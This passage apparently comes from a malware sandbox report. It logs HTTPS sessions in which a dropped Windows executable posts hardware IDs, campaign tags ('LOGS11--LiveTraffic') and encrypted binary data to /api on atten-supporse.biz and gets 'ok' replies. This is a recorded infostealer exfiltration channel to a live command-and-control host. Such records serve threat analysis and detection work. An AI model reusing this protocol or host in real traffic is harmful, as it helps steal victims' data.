                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC1369INData Raw: 72 76 55 47 49 68 4f 57 57 62 74 41 39 64 4f 70 51 64 36 4b 4c 68 50 43 79 39 72 67 4c 70 31 35 78 73 72 70 66 70 45 2b 63 78 79 76 39 6f 59 67 30 49 56 4b 4b 6b 4a 7a 78 7a 79 51 46 4d 71 6f 45 6f 43 4a 6d 65 64 71 54 37 33 55 79 44 70 38 31 71 38 68 69 44 38 6e 31 4f 41 57 6c 6c 77 37 54 4c 49 48 75 31 45 46 68 4b 39 57 78 34 71 62 5a 72 68 4b 72 5a 4d 63 75 4c 78 43 4f 48 55 4e 4c 50 59 45 49 68 44 45 43 53 67 41 63 59 4c 2f 45 46 51 4b 61 46 59 44 69 64 68 6b 36 73 32 2b 56 38 37 34 76 56 50 75 6f 5a 79 38 70 45 55 6e 77 4a 42 61 49 51 44 33 51 44 74 42 30 74 74 73 68 67 50 4c 53 44 4f 34 54 48 79 57 6a 62 69 38 55 36 38 6b 6a 2b 39 33 68 4b 48 54 52 30 6a 70 41 4c 4f 41 2f 68 4b 55 44 47 68 55 77 63 74 61 5a 71 73 64 62 59 56 4e 66 32 39 45 50 6d 6c
                                                                                                                                                                                                                                                              Data Ascii: rvUGIhOWWbtA9dOpQd6KLhPCy9rgLp15xsrpfpE+cxyv9oYg0IVKKkJzxzyQFMqoEoCJmedqT73UyDp81q8hiD8n1OAWllw7TLIHu1EFhK9Wx4qbZrhKrZMcuLxCOHUNLPYEIhDECSgAcYL/EFQKaFYDidhk6s2+V874vVPuoZy8pEUnwJBaIQD3QDtB0ttshgPLSDO4THyWjbi8U68kj+93hKHTR0jpALOA/hKUDGhUwctaZqsdbYVNf29EPml
                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC1369INData Raw: 36 4e 55 42 4d 6a 71 41 6e 43 41 2f 35 42 55 69 69 6e 53 67 45 68 59 35 33 68 65 37 68 53 4b 71 57 6c 43 4a 71 44 4a 4c 62 57 48 35 46 4a 47 43 75 37 43 64 39 4f 73 77 64 46 4a 4c 6f 59 55 44 64 77 67 61 59 71 74 6b 78 79 34 76 45 49 34 64 51 30 74 64 63 55 67 55 77 4c 4c 61 73 4c 77 41 66 30 51 31 77 67 71 31 77 4d 4a 6d 57 56 72 54 37 2f 56 6a 33 68 39 45 61 77 6d 33 4c 79 6b 52 53 66 41 6b 46 6f 6a 42 2f 4d 41 76 41 48 53 32 32 79 47 41 38 74 49 4d 37 68 4f 66 5a 51 4d 75 2f 37 54 4c 79 53 4f 4c 6e 52 47 49 52 4e 48 53 36 70 43 38 38 46 39 45 5a 53 4a 71 46 54 44 69 78 6a 6b 4b 64 31 74 68 55 31 2f 62 30 51 2b 62 51 70 73 64 30 55 78 31 31 58 4d 65 30 44 77 30 36 6c 42 31 38 76 72 31 38 49 4c 47 4f 65 70 44 48 79 55 44 4c 74 37 30 43 35 6b 79 43 75 30
                                                                                                                                                                                                                                                              Data Ascii: 6NUBMjqAnCA/5BUiinSgEhY53he7hSKqWlCJqDJLbWH5FJGCu7Cd9OswdFJLoYUDdwgaYqtkxy4vEI4dQ0tdcUgUwLLasLwAf0Q1wgq1wMJmWVrT7/Vj3h9Eawm3LykRSfAkFojB/MAvAHS22yGA8tIM7hOfZQMu/7TLySOLnRGIRNHS6pC88F9EZSJqFTDixjkKd1thU1/b0Q+bQpsd0Ux11XMe0Dw06lB18vr18ILGOepDHyUDLt70C5kyCu0
                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC1369INData Raw: 42 61 4a 4e 45 33 51 33 74 52 46 73 79 6c 52 68 51 4f 46 37 57 71 69 50 2f 52 54 48 7a 39 6b 57 31 68 51 7a 38 69 55 66 56 45 45 74 36 2f 78 75 50 45 63 49 4a 46 43 4c 72 41 44 45 34 49 49 44 68 62 61 6f 62 63 76 65 39 45 50 6e 54 4d 61 37 44 46 59 52 55 47 6d 2b 54 4f 75 67 59 39 30 42 45 4a 4c 78 58 53 47 38 67 6d 65 46 74 77 52 55 37 34 75 5a 5a 72 35 6b 69 75 35 45 73 79 51 49 42 61 50 56 45 2b 67 33 7a 53 56 4d 31 75 68 55 76 4e 32 71 52 73 54 4c 76 57 6e 4b 72 76 55 37 35 7a 47 48 79 6b 52 65 57 41 6b 46 34 2f 31 2b 61 58 61 6f 58 42 6a 7a 6c 51 55 67 33 49 4d 37 7a 65 37 68 48 63 72 32 39 44 37 71 47 49 4c 72 53 42 59 51 46 4a 78 61 4b 48 73 49 49 36 6c 5a 71 48 61 78 43 42 53 64 33 68 2b 30 67 2b 31 73 38 34 75 73 49 39 39 51 39 2f 49 6b 71 78 77
                                                                                                                                                                                                                                                              Data Ascii: BaJNE3Q3tRFsylRhQOF7WqiP/RTHz9kW1hQz8iUfVEEt6/xuPEcIJFCLrADE4IIDhbaobcve9EPnTMa7DFYRUGm+TOugY90BEJLxXSG8gmeFtwRU74uZZr5kiu5EsyQIBaPVE+g3zSVM1uhUvN2qRsTLvWnKrvU75zGHykReWAkF4/1+aXaoXBjzlQUg3IM7ze7hHcr29D7qGILrSBYQFJxaKHsII6lZqHaxCBSd3h+0g+1s84usI99Q9/Ikqxw
                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC1369INData Raw: 58 4a 39 63 70 68 49 48 64 50 73 4b 46 32 39 35 31 72 64 31 6f 41 64 38 70 65 38 49 34 64 52 31 76 38 4d 42 67 55 45 50 4b 2b 6f 36 38 53 6e 7a 51 46 55 31 75 30 38 48 48 31 36 44 6f 6a 76 32 55 69 54 30 76 51 62 35 6d 33 4c 6b 36 46 50 50 41 69 5a 6d 37 52 79 50 56 72 31 79 56 79 32 6c 58 78 34 77 4c 62 47 76 4d 76 6c 44 49 76 4c 79 43 50 66 55 4e 50 79 4a 51 63 6b 43 48 54 6e 74 58 4a 39 63 70 68 49 48 64 50 73 4b 46 32 39 35 31 72 64 31 6f 41 64 38 70 65 38 49 34 64 52 31 76 38 4d 42 67 55 45 50 4b 2b 6f 36 38 53 6e 7a 51 46 55 31 75 30 38 48 62 6b 36 67 67 41 76 47 51 44 48 72 38 30 2b 76 68 58 4c 79 6b 52 7a 48 47 69 42 6f 35 55 54 77 51 4c 31 66 46 48 76 72 62 51 73 76 62 70 47 33 4a 4c 56 79 50 4f 4c 38 58 71 6d 44 50 66 50 2f 4a 61 59 43 56 32 69
                                                                                                                                                                                                                                                              Data Ascii: XJ9cphIHdPsKF2951rd1oAd8pe8I4dR1v8MBgUEPK+o68SnzQFU1u08HH16Dojv2UiT0vQb5m3Lk6FPPAiZm7RyPVr1yVy2lXx4wLbGvMvlDIvLyCPfUNPyJQckCHTntXJ9cphIHdPsKF2951rd1oAd8pe8I4dR1v8MBgUEPK+o68SnzQFU1u08Hbk6ggAvGQDHr80+vhXLykRzHGiBo5UTwQL1fFHvrbQsvbpG3JLVyPOL8XqmDPfP/JaYCV2i
                                                                                                                                                                                                                                                              2024-12-09 22:09:19 UTC1369INData Raw: 76 70 35 61 67 36 35 58 78 67 69 49 71 65 33 4e 76 68 62 4e 61 57 7a 43 4b 48 55 61 76 7a 38 41 59 42 53 47 6d 6a 6a 52 4d 4e 4f 70 51 64 5a 4d 61 78 49 43 32 31 6e 6a 4b 5a 31 35 78 73 72 70 65 73 49 34 63 64 38 2f 4d 4e 54 33 77 4a 65 4a 71 41 46 7a 41 44 2b 56 55 59 6c 71 45 34 4c 5a 6c 36 6f 6a 43 66 2f 52 54 47 6e 7a 45 57 39 67 69 65 2f 77 52 53 35 66 44 51 36 71 68 54 4d 54 4e 46 41 57 53 2b 56 5a 6a 38 77 5a 34 62 6a 45 2f 74 44 4d 61 57 7a 43 4b 48 55 61 76 7a 38 41 59 42 53 47 6d 71 42 41 38 49 43 76 56 67 61 4f 75 74 4f 53 48 6b 7a 32 4f 45 6e 75 41 31 79 6f 76 35 61 71 35 49 78 71 74 4a 55 75 58 77 30 4f 71 6f 55 7a 45 7a 4d 53 6c 41 31 76 6c 73 59 4a 6c 36 6f 6a 43 66 2f 52 54 47 6e 32 48 4c 37 70 53 53 2f 30 52 32 41 41 6c 64 6f 74 55 53 58
                                                                                                                                                                                                                                                              Data Ascii: vp5ag65XxgiIqe3NvhbNaWzCKHUavz8AYBSGmjjRMNOpQdZMaxIC21njKZ15xsrpesI4cd8/MNT3wJeJqAFzAD+VUYlqE4LZl6ojCf/RTGnzEW9gie/wRS5fDQ6qhTMTNFAWS+VZj8wZ4bjE/tDMaWzCKHUavz8AYBSGmqBA8ICvVgaOutOSHkz2OEnuA1yov5aq5IxqtJUuXw0OqoUzEzMSlA1vlsYJl6ojCf/RTGn2HL7pSS/0R2AAldotUSX


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.449800104.21.48.14437872C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:20 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=HZJYWUF0AI
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 18121
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:20 UTC15331OUTData Raw: 2d 2d 48 5a 4a 59 57 55 46 30 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 48 5a 4a 59 57 55 46 30 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 5a 4a 59 57 55 46 30 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 5a 4a 59 57 55 46 30 41 49 0d 0a 43 6f
                                                                                                                                                                                                                                                              Data Ascii: --HZJYWUF0AIContent-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--HZJYWUF0AIContent-Disposition: form-data; name="pid"2--HZJYWUF0AIContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HZJYWUF0AICo
                                                                                                                                                                                                                                                              2024-12-09 22:09:20 UTC2790OUTData Raw: 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7
                                                                                                                                                                                                                                                              Data Ascii: 'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwm
                                                                                                                                                                                                                                                              2024-12-09 22:09:21 UTC1022INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:21 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=5nh5a5q4qfvam00h5ipvhpbdif; expires=Fri, 04-Apr-2025 15:56:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eNlfTZgl%2F7TO8s9BX7MIS%2BiR4Z4KiN0DX1uUKvyTHHqtQGKzrupG1cMVCydL5W%2BmI0ubixIGGHA8GJS1VkfGu%2Fv4onVcNBZgCtjNnNSZ0lR8JoEkEl0QxQIykJxfVdwYdobP1yk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef851a96d5df797-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1684&min_rtt=1682&rtt_var=635&sent=14&recv=22&lost=0&retrans=0&sent_bytes=2845&recv_bytes=19077&delivery_rate=1717647&cwnd=151&unsent_bytes=0&cid=308227ffaf27bff5&ts=1013&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:21 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                                              2024-12-09 22:09:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              3192.168.2.449806104.21.48.14437872C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:23 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=YPGA8JS93XL7NS
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8766
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:23 UTC8766OUTData Raw: 2d 2d 59 50 47 41 38 4a 53 39 33 58 4c 37 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 59 50 47 41 38 4a 53 39 33 58 4c 37 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 50 47 41 38 4a 53 39 33 58 4c 37 4e 53 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 59 50
                                                                                                                                                                                                                                                              Data Ascii: --YPGA8JS93XL7NSContent-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--YPGA8JS93XL7NSContent-Disposition: form-data; name="pid"2--YPGA8JS93XL7NSContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--YP
                                                                                                                                                                                                                                                              2024-12-09 22:09:23 UTC1023INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:23 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=o9hp7vdlltg06k2f788bkd7i1b; expires=Fri, 04-Apr-2025 15:56:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nq%2Bgr%2FxOKQViuUrjwmabIJSAOrfTXyZW5p7IQo8E%2B2vF3luX4pNt16yesGy5TqYWI%2BpQkmEW7a2bnexxAcaRMZ%2BIkMYLgRhsJRbCxG9XVW%2BpE6ONLrrH3Nu4GqUxFwMfsQlhUV8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef851b82d827ced-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1821&min_rtt=1819&rtt_var=687&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9703&delivery_rate=1587819&cwnd=179&unsent_bytes=0&cid=5ef581498ebdad46&ts=915&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:23 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                                              2024-12-09 22:09:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.2.449814104.21.48.14437872C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:25 UTC281OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=85Y4Z2SP48LS6Y3
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20425
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:25 UTC15331OUTData Raw: 2d 2d 38 35 59 34 5a 32 53 50 34 38 4c 53 36 59 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 38 35 59 34 5a 32 53 50 34 38 4c 53 36 59 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 35 59 34 5a 32 53 50 34 38 4c 53 36 59 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d
                                                                                                                                                                                                                                                              Data Ascii: --85Y4Z2SP48LS6Y3Content-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--85Y4Z2SP48LS6Y3Content-Disposition: form-data; name="pid"3--85Y4Z2SP48LS6Y3Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic-
                                                                                                                                                                                                                                                              2024-12-09 22:09:25 UTC5094OUTData Raw: 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                              Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                              2024-12-09 22:09:26 UTC1012INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:26 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=4t82psopfhbavejrft4u49p0dq; expires=Fri, 04-Apr-2025 15:56:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JeHFOmEtybonN8ruih2equKEqCMirSEY04W2cwLfbriM2WMS7GMi4so1iZQiulv9P1K3TobGeaaCEseLQZLZ1BM9kAuWUjw15oU3657ke8V8MTojPF337epreu2gR1BIuAxqYLc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef851c808820cc8-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1494&min_rtt=1489&rtt_var=569&sent=9&recv=24&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21386&delivery_rate=1903520&cwnd=225&unsent_bytes=0&cid=fa460a372ffa728d&ts=916&x=0"
                                                                                                                                                                                                                                                              2024-12-09 22:09:26 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.228
                                                                                                                                                                                                                                                              2024-12-09 22:09:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.2.449821104.21.48.14437872C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-09 22:09:28 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=9MPCDGALXAXSGI
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1236
                                                                                                                                                                                                                                                              Host: atten-supporse.biz
                                                                                                                                                                                                                                                              2024-12-09 22:09:28 UTC1236OUTData Raw: 2d 2d 39 4d 50 43 44 47 41 4c 58 41 58 53 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 41 33 34 35 30 46 30 45 43 39 32 32 34 42 37 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 39 4d 50 43 44 47 41 4c 58 41 58 53 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 4d 50 43 44 47 41 4c 58 41 58 53 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 39 4d
                                                                                                                                                                                                                                                              Data Ascii: --9MPCDGALXAXSGIContent-Disposition: form-data; name="hwid"3A3450F0EC9224B723D904AF30EFEBBC--9MPCDGALXAXSGIContent-Disposition: form-data; name="pid"1--9MPCDGALXAXSGIContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--9M
                                                                                                                                                                                                                                                              2024-12-09 22:09:29 UTC1014INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Mon, 09 Dec 2024 22:09:29 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=se6nq22fq72ti7uc07li7v2u18; expires=Fri, 04-Apr-2025 15:56:08 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nRPpUlcJHZMHQU4k99ydEY807cwKX2p0cs%2B4Au80EcP18Mf1QE4BB3kdIfkP5G4XqNaubzt2ui5RXr1JlPmY6UjaQnNb5eRuen9uFWJXn3DuQNTUeiA44wD3pH6POutiK820%2Fjs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8ef851dbca9af797-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
